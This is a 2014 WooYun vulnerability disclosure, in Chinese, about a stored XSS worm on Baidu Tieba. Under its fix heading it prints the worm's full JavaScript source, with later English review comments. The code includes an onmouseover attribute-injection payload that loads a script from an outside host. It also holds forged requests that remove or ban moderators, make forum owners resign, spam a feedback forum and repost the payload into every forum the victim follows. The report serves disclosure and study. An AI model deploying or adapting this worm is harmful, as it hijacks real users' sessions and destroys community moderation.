
漏洞概要

缺陷编号:wooyun-2014-053252

漏洞标题:今天百度贴吧的XSS漏洞

相关厂商:百度

漏洞作者: 马云

提交时间:2014-03-10 11:06

修复时间:2014-04-24 11:07

公开时间:2014-04-24 11:07

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2014-03-10: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-24: 细节向公众公开

简要描述:

所有帖子全部是转帖,来自test吧,点击以后,会获取当前账号cookie,并自动转帖。如果有吧务权限,大吧主则自动申请辞职,并删除小吧主;小吧主则会封禁所有吧务。

详细说明:

不要点开那些爆吧格式的帖子查看,否则会被盗号,并且自动封禁自己有吧务权限的吧里的吧务组!吧务请在外面用帖子管理工具删除,不要点进去!

漏洞证明:

ld.jpg


一秒全封吧务

修复方案:

// Worm bootstrap state, as pasted in the report. jQuery (`$`) and Tieba's page-global
// `PageData` are assumed to already be in scope; neither is defined in this listing.
// `n` counts the victim's followed forums; `num` is the cursor that reply() advances through them.
// `config.titles` / `config.contents`: \u-escaped Chinese strings, one picked at random per post.
// `config.tbs`: the per-page token Tieba expects on write requests, read directly from PageData —
// every forged request below simply echoes it back.
// `config.whiteList`: forum ids reply() skips.
// `config.evilContent`: the injected payload — a `"` that closes the enclosing HTML attribute,
// followed by an `onmouseover` handler that pulls a remote script. This is the attribute-injection
// point the report's fix section should be addressing (output into attributes is not entity-encoded).
// NOTE(review): the trailing `//xss` line comment swallows the closing `};` of the object literal on
// this line, so the listing as pasted is not syntactically valid — most likely a line break lost
// when the report was extracted; left untouched here.
var n=PageData.user.user_forum_list.info.length;var num=0;var config = { titles: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f", "\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u6b3a\u9a97\u4e00\u5f00\u59cb\u7684\u4f60 \u6b3a\u9a97\u4e16\u754c\u5427","\u8c01\u8981\u5403\u53d8\u6001\u7684\u9999\u8549\uff01","\u521a\u624d\u6536\u5230\u4e86\u5f3a\u70c8\u7684\u7cbe\u795e\u653b\u51fb \u5fc3...\u5fc3\u7075\u6b63\u906d\u5230\u4fb5\u8680","\u4e0d\u8981\u9760\u8fd1\u6211\uff01\u6211\u6b63\u5728\u6267\u884c\u963b\u6b62\u673a\u5173\u66b4\u529b\u884c\u4e3a\u7684\u4f5c\u6218","\u624b\u62ff\u91d1\u5777\u5783\uff0c\u811a\u8e0f\u4e03\u5f69\u4e91\u7aef\uff0c\u53d1\u51fa\u6700\u540e\u7684\u5450\u558a","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],contents: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f","\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],tbs: PageData.tbs,whiteList: [635137, 1074587, 116863], evilContent: '"onmouseover="$.getScript(\u0027//newwordpress.duapp.com/xss20140309/rc1.js\u0027)' //xss};
// `userInfo.is_red_tail`: an immediately-invoked function whose only `return` sits inside the
// asynchronous $.get callback; the outer function returns nothing, so the property is always
// `undefined`. Every branch keyed on it further down is therefore dead as written.
// `userInfo.is_bawu`: classifies the victim from PageData.user.power — "daba" when `bawu` and
// `can_edit_gconforum` are set, "xiaoba" when only `bawu` is set, otherwise "none"
// (the report's prose maps these to 大吧主 / 小吧主).
// addGood(): GET against Tieba's mobile endpoint (tn=bdSGD) marking thread `tid` in forum `fid`;
// it is not called anywhere in this listing.
var userInfo = { is_red_tail:function(i){$.get('http://tieba.baidu.com/home/get/panel?ie=utf-8&un='+PageData.user.name,function(data){return data.data.identity});}(),is_bawu: function (p) {return p.bawu ? p.can_edit_gconforum ? "daba" : "xiaoba" : "none"}(PageData.user.power)};function addGood(fid, kw, tid) {$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdSGD&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&z=' + tid + '&fid=' + fid + '&ntn=set&pn=0&cate=0&expand=0&pinf=1_2_0');}
// topThread(): GET against the same mobile endpoint with tn=bdTOP, pinning thread `tid` in forum
// `fid`; like addGood() it is defined but never called in this listing. The long opaque segment
// in the URL path is copied verbatim from the report and its meaning is not determinable here.
function topThread(fid, kw, tid) { $.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdTOP&z=' + tid + '&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&expand=0&fid=' + fid + '&ntn=set&pinf=1_2_0');}
// killXiaoBa(): fetches the current forum's bawu-team page, then for every `li` in the `assist`
// list POSTs delBawuMember with that entry's user_id — i.e. removes each assistant moderator of the
// forum the victim owns, authenticated only by the victim's session plus the page token `tbs`.
// Reached only on the "daba" branch at the bottom of the listing. The list is fetched and parsed
// from HTML with jQuery selectors tied to the 2014 page layout.
function killXiaoBa() {$.get("/bawu2/platform/listBawuTeam?ie=utf-8&word=" + encodeURIComponent(PageData.forum.name), function (x) {$(x).find("ul[id*='assist']").find("li[data-field*='\"user_id\":']").each(function () {$.post("/bawu2/platform/delBawuMember", {tbs: config.tbs,word: PageData.forum.name,user_id: $.parseJSON(this.dataset.field).user_id,type: "assist",ie: "utf-8"});});});}
// banXiaoBa(): fetches the forum's admin_group page, takes every anchor in its third table row and
// POSTs a one-day `filter_forum_user` ban (ban_days: 1) for that user name. Reached only on the
// "xiaoba" branch. Which accounts end up in `tr:nth-child(3)` depends entirely on the 2014 page
// layout and cannot be confirmed from this listing; the report's prose says it is the moderator team.
function banXiaoBa() {$.get('http://tieba.baidu.com/f/bawu/admin_group?ie=utf-8&kw=' + encodeURIComponent(PageData.forum.name) + '&fid=' + PageData.forum.id, function (res) {$(res).find('tr:nth-child(3)').find('a').each(function () {$.post('/bawu/cm', {cm: 'filter_forum_user',ban_days: 1,user_name: $(this).text(),word: PageData.forum.name,fid: PageData.forum.id,tbs: config.tbs,ie: 'utf-8'})})})}
// czDaba(): POSTs an `apply_resign` action for the current forum with a fixed (\u-escaped)
// resignation message — the victim, if forum owner, resigns on their own behalf. Called right after
// killXiaoBa() on the "daba" branch; nothing in the listing waits for the two requests to order.
function czDaba() {$.post('/bawu/cm', {cm: 'apply_resign',resignation: '\u518d\u89c1\u4e86 \u6211\u7684\u670b\u53cb\u4eec.',dtype: 'json',word: PageData.forum.name,fid: PageData.forum.id,tbs: config.tbs,ie: 'utf-8'})}
// addThread(): the propagation step. POSTs a repost (`__type__: "repost"`) of one fixed source
// thread (kw "test", fid 35, tid/ptid 2910585163) into the target forum `fid`, with a random title
// and a content string whose tail is config.evilContent — so each new post carries the attribute
// injection onward. The leading hex string followed by `#` is copied from the report; its meaning is
// not determinable from this listing. The callback's `return x.new_thread_id` is discarded by $.post,
// so the new thread id is never used.
function addThread(fid) {$.post("/relay/commit", {ie: "utf-8",kw: "test", fid:35, tid:2910585163,ftid: fid, ptid:2910585163, ppid:47102132189,tbs: PageData.tbs,title: config.titles[Math.random() * config.titles.length | 0],content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,new_vcode:1,tag:11,activity_id:1425,act_type:"photo",__type__:"repost"},function (x) { if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})}
// reply(): invoked every 2 s by the `ruchong` interval at the bottom of the listing. Each call looks
// at the forum at index `num` in the victim's followed-forum list: whitelisted forums, and (because
// userInfo.is_red_tail is always undefined) forums without `is_like`, are skipped; otherwise the
// entry is flagged via a `tid` property and addThread() is called once for that forum id.
// NOTE(review): `num` is never compared against `n`, so once the cursor runs past the end of
// `.info` the `.id` access on `undefined` throws inside the interval callback on every tick.
function reply(){ if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;} if(PageData.user.user_forum_list.info[num].tid){ num++; }else{ PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id); }}
// fuckRedTail(): fires 100 `/f/commit/thread/add` POSTs in a tight loop, all into forum 898666
// (kw is the \u-escaped name of Tieba's feedback forum) with a fixed title and a random content
// string. It is only scheduled when userInfo.is_red_tail is truthy, which never happens as written.
// NOTE(review): as pasted, `}for(` has neither a `;` nor a line break between the object literal and
// the `for` statement, which a strict parser rejects — presumably another line break lost in extraction.
function fuckRedTail() {var obj = {ie: "utf-8",kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",fid: 898666,tbs: PageData.tbs,title: "\u767e\u5ea6SB",content: config.contents[Math.random() * config.contents.length | 0]}for(var i=0;i<100;i++){$.post("/f/commit/thread/add",obj);}}
// Entry point. Order of effects on the victim, keyed on userInfo.is_bawu:
//   "daba"   -> killXiaoBa() then czDaba() (strip assistants, then resign);
//   "xiaoba" -> banXiaoBa();
// and, for every victim, the `ruchong` interval drives reply() every 2 s to repost the payload into
// each followed forum. The 8 s fuckRedTail() interval is gated on is_red_tail and never starts.
// Both setInterval calls pass a string rather than a function reference (eval-style scheduling).
if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}if ("xiaoba" === userInfo.is_bawu) banXiaoBa();var ruchong=setInterval("reply()",2000);
以上是源码,修复还得靠度娘。从源码看,注入点是转帖内容中未经转义的引号闭合了 HTML 属性并附加了 onmouseover 事件,后续所有操作都只依赖受害者会话和页面内的 tbs 参数;修复应对输出到属性中的用户内容做 HTML 实体编码。

版权声明:转载请注明来源 马云@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-03-10 11:38

厂商回复:

跟熊猫报告的是同一个漏洞,当前业务部门正在处理。感谢对百度安全的支持。

最新状态:

暂无